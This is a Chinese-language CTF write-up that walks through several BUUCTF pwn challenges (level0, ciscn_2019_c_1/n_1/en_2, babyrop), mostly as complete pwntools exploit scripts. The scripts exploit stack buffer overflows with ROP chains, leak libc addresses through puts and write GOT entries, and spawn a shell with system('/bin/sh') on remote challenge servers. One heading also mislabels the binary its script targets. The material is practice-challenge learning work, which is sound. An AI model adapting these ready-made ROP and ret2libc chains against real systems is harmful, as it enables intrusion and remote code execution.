下班了继续做
level0
先checksec一下
思路很简单：vulner 函数里面存在溢出漏洞，覆盖之后 call 到 callsystem 就好了。
覆盖 0x80 个字节就好了。
算了，之后这种简单题就直接贴 payload 吧。
ciscn_2019_n_1
这道题看了源码是逆向加pwn
逆向完就很简单了
就直接ret2libc
因为是 64 位程序，参数通过寄存器传递，所以需要先找一下 pop rdi 之类的 gadget。
直接贴代码吧
#coding=utf8
from pwn import *
from LibcSearcher import *
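# Connection / debugging setup for the ciscn_2019_c_1 solve script.
# NOTE(review): the section heading above reads ciscn_2019_n_1, but the
# binary loaded here is ciscn_2019_c_1 — the heading looks like a typo.
context.log_level = 'debug'
# The original assigned context.terminal twice (gnome-terminal, then tmux);
# only the last value ever took effect, so the dead assignment is dropped.
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'

# 0 = talk to the remote challenge instance, 1 = spawn the binary locally
# (z() then attaches gdb).
local = 0
if local:
    cn = process('./ciscn_2019_c_1')
    bin1 = ELF('./ciscn_2019_c_1', checksec=False)
else:
    cn = remote('node3.buuoj.cn', 29644)
    # checksec output is left enabled here, as in the original.
    bin1 = ELF('./ciscn_2019_c_1')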
def z(a=''):
    """Attach gdb to the target process, but only when running locally.

    a: gdb command string handed to gdb.attach (breakpoints etc.). When it
       is empty the script blocks on raw_input() so the debugger can be set
       up by hand before continuing. Does nothing in remote mode.
    """
    if not local:
        return
    gdb.attach(cn, a)
    if a == '':
        raw_input()
# z('b*0x0400AD6\nc')   # uncomment to break inside the overflowing routine (local only)

# Addresses taken from the binary itself.
# NOTE(review): these fixed addresses only work if the binary is not PIE —
# confirm with checksec. PIE, or a stack canary, would defeat this chain.
pop_rdi = 0x00400c83   # pop rdi ; ret
main_addr = 0x0400B28  # return into main so a second payload can be sent

# --- stage 1: leak the runtime address of puts -----------------------------
# Menu option 1 is the routine that prints 'encrypted' and reads the
# oversized input.
cn.sendline('1')
cn.recvuntil('encrypted\n')
# 0x50 bytes of filler, one zeroed slot (presumably the saved rbp), then
# puts(puts@got) followed by a jump back to main.
leak_chain = flat(
    'A' * 0x50, 0,
    pop_rdi, bin1.got['puts'],
    bin1.plt['puts'],
    main_addr,
)
cn.sendline(leak_chain)
cn.recvuntil('O\n')
raw_leak = cn.recvuntil('\n')[:-1]
puts_addr = u64(raw_leak.ljust(8, '\x00'))
log.success(hex(puts_addr))
cn.recvuntil('choice!\n')

# --- stage 2: resolve libc from the leak and call system("/bin/sh") --------
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")
system_addr = libc_base + libc.dump("system")
str_bin_sh = libc_base + libc.dump("str_bin_sh")

cn.sendline('1')
cn.recvuntil('encrypted\n')
# 0x0400B27 (main_addr - 1): presumably a lone `ret` used to realign the
# stack before entering system — TODO confirm in the disassembly.
shell_chain = flat(
    'A' * 0x50, 0,
    0x0400B27,
    pop_rdi, str_bin_sh,
    system_addr,
)
cn.sendline(shell_chain)
cn.interactive()
babyrop
from pwn import *
from LibcSearcher import *
# context.log_level = 'debug'
# p = process("./babyrop")          # local alternative to the remote instance
p = remote('node3.buuoj.cn', 26990)
elf = ELF("./babyrop")
# gdb.attach(p)

# Constants from the 32-bit binary.
# NOTE(review): the absolute main/PLT/GOT addresses assume the binary is not
# PIE — confirm with checksec.
main_addr = 0x08048825
write_plt = elf.plt['write']
write_got = elf.got['write']

# First input for each round. Presumably the leading NUL satisfies a string
# comparison and 0xff lands in the byte that sizes the following read;
# the 0x2c/0x25 offsets come from the disassembly — TODO confirm.
check_input = "\x00\x00\x00\x00" + "a" * (0x2c - 0x25 - 0x4) + "\xff"

# --- stage 1: leak write's libc address ------------------------------------
p.sendline(check_input)
p.recvuntil("Correct\n")
# 0xE7 bytes of filler, a throwaway slot, then write(1, write@got, 4) with
# main as its return address so the program can be driven a second time.
leak_chain = (
    "a" * 0xE7
    + p32(0xdeadbeef)
    + p32(write_plt) + p32(main_addr)
    + p32(1) + p32(write_got) + p32(4)
)
p.sendline(leak_chain)
write_addr = u32(p.recv(4))
print("write_addris " + hex(write_addr))

# --- stage 2: resolve libc and call system("/bin/sh") ----------------------
libc = LibcSearcher("write", write_addr)
libc_base = write_addr - libc.dump("write")
system_addr = libc_base + libc.dump("system")
str_bin_sh = libc_base + libc.dump("str_bin_sh")
print("libc_base is " + hex(libc_base))
print("system_addr is " + hex(system_addr))
print("str_bin_sh is " + hex(str_bin_sh))

p.sendline(check_input)
p.recvuntil("Correct\n")
shell_chain = (
    "a" * 0xE7
    + p32(0xdeadbeef)
    + p32(system_addr) + p32(main_addr) + p32(str_bin_sh)
)
p.sendline(shell_chain)
p.interactive()
ciscn_2019_n_1
关键函数好像存在栈溢出，把目标变量覆盖成下面 payload 里的那个值就好了。
没试过直接输入小数。
该值就存储在这个位置，所以只要盖成这个值就好了。
#coding=utf8
from pwn import *
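# Connection / debugging setup for the ciscn_2019_n_1 solve script.
context.log_level = 'debug'
# The original assigned context.terminal twice (gnome-terminal, then tmux);
# only the last value ever took effect, so the dead assignment is dropped.
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'i386'

# 1 = spawn the binary locally (z() attaches gdb), 0 = remote instance.
local = 1
if local:
    cn = process('./ciscn_2019_n_1')
    # bin = ELF('./task_shoppingCart',checksec=False)
    # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
    # libc = ELF('/lib/i386-linux-gnu/libc.so.6',checksec=False)
else:
    cn = remote('node3.buuoj.cn', 27179)
    # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)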
def z(a=''):
    """Attach gdb to the target process, but only when running locally.

    a: gdb command string handed to gdb.attach (breakpoints etc.). When it
       is empty the script blocks on raw_input() so the debugger can be set
       up by hand before continuing. Does nothing in remote mode.
    """
    if not local:
        return
    gdb.attach(cn, a)
    if a == '':
        raw_input()
# Break at the comparison when running locally (no-op in remote mode).
z('b*0x04006A2')
# system_addr = 0x08048F0E   # leftover from another script, unused here

# 0x41348000 is the IEEE-754 single-precision encoding of 11.28125.
# 0x30-0x4 bytes of filler place it in the stack slot the program compares
# against (presumably the float the write-up refers to — confirm with the
# breakpoint above). A bounds-checked read of the buffer would remove the
# overflow entirely.
target_bits = 0x41348000
overflow = flat('A' * (0x30 - 0x4), target_bits)
cn.sendline(overflow)
cn.interactive()
ciscn_2019_en_2
payload 和上一题一样。
#coding=utf8
from pwn import *
from LibcSearcher import *
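# Connection / debugging setup for the ciscn_2019_en_2 solve script.
context.log_level = 'debug'
# The original assigned context.terminal twice (gnome-terminal, then tmux);
# only the last value ever took effect, so the dead assignment is dropped.
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'

# 0 = talk to the remote challenge instance, 1 = spawn the binary locally
# (z() then attaches gdb).
local = 0
# Fix: the local branch used to spawn ./ciscn_2019_c_1 while the remote
# branch parsed ./ciscn_2019_en_2, so local debugging exercised a different
# binary than the one this script targets. Both modes now use the same path.
if local:
    cn = process('./ciscn_2019_en_2')
    bin1 = ELF('./ciscn_2019_en_2', checksec=False)
else:
    cn = remote('node3.buuoj.cn', 26666)
    # checksec output is left enabled here, as in the original.
    bin1 = ELF('./ciscn_2019_en_2')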
def z(a=''):
    """Attach gdb to the target process, but only when running locally.

    a: gdb command string handed to gdb.attach (breakpoints etc.). When it
       is empty the script blocks on raw_input() so the debugger can be set
       up by hand before continuing. Does nothing in remote mode.
    """
    if not local:
        return
    gdb.attach(cn, a)
    if a == '':
        raw_input()
# z('b*0x0400AD6\nc')   # uncomment to break inside the overflowing routine (local only)

# Addresses taken from the binary itself.
# NOTE(review): these fixed addresses only work if the binary is not PIE —
# confirm with checksec. PIE, or a stack canary, would defeat this chain.
pop_rdi = 0x00400c83   # pop rdi ; ret
main_addr = 0x0400B28  # return into main so a second payload can be sent

# --- stage 1: leak the runtime address of puts -----------------------------
# Menu option 1 is the routine that prints 'encrypted' and reads the
# oversized input.
cn.sendline('1')
cn.recvuntil('encrypted\n')
# 0x50 bytes of filler, one zeroed slot (presumably the saved rbp), then
# puts(puts@got) followed by a jump back to main.
leak_chain = flat(
    'A' * 0x50, 0,
    pop_rdi, bin1.got['puts'],
    bin1.plt['puts'],
    main_addr,
)
cn.sendline(leak_chain)
# This binary's banner differs from ciscn_2019_c_1 ('L ' instead of 'O').
cn.recvuntil('L \n')
raw_leak = cn.recvuntil('\n')[:-1]
puts_addr = u64(raw_leak.ljust(8, '\x00'))
log.success(hex(puts_addr))
cn.recvuntil('choice!\n')

# --- stage 2: resolve libc from the leak and call system("/bin/sh") --------
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")
system_addr = libc_base + libc.dump("system")
str_bin_sh = libc_base + libc.dump("str_bin_sh")

cn.sendline('1')
cn.recvuntil('encrypted\n')
# 0x0400B27 (main_addr - 1): presumably a lone `ret` used to realign the
# stack before entering system — TODO confirm in the disassembly.
shell_chain = flat(
    'A' * 0x50, 0,
    0x0400B27,
    pop_rdi, str_bin_sh,
    system_addr,
)
cn.sendline(shell_chain)
cn.interactive()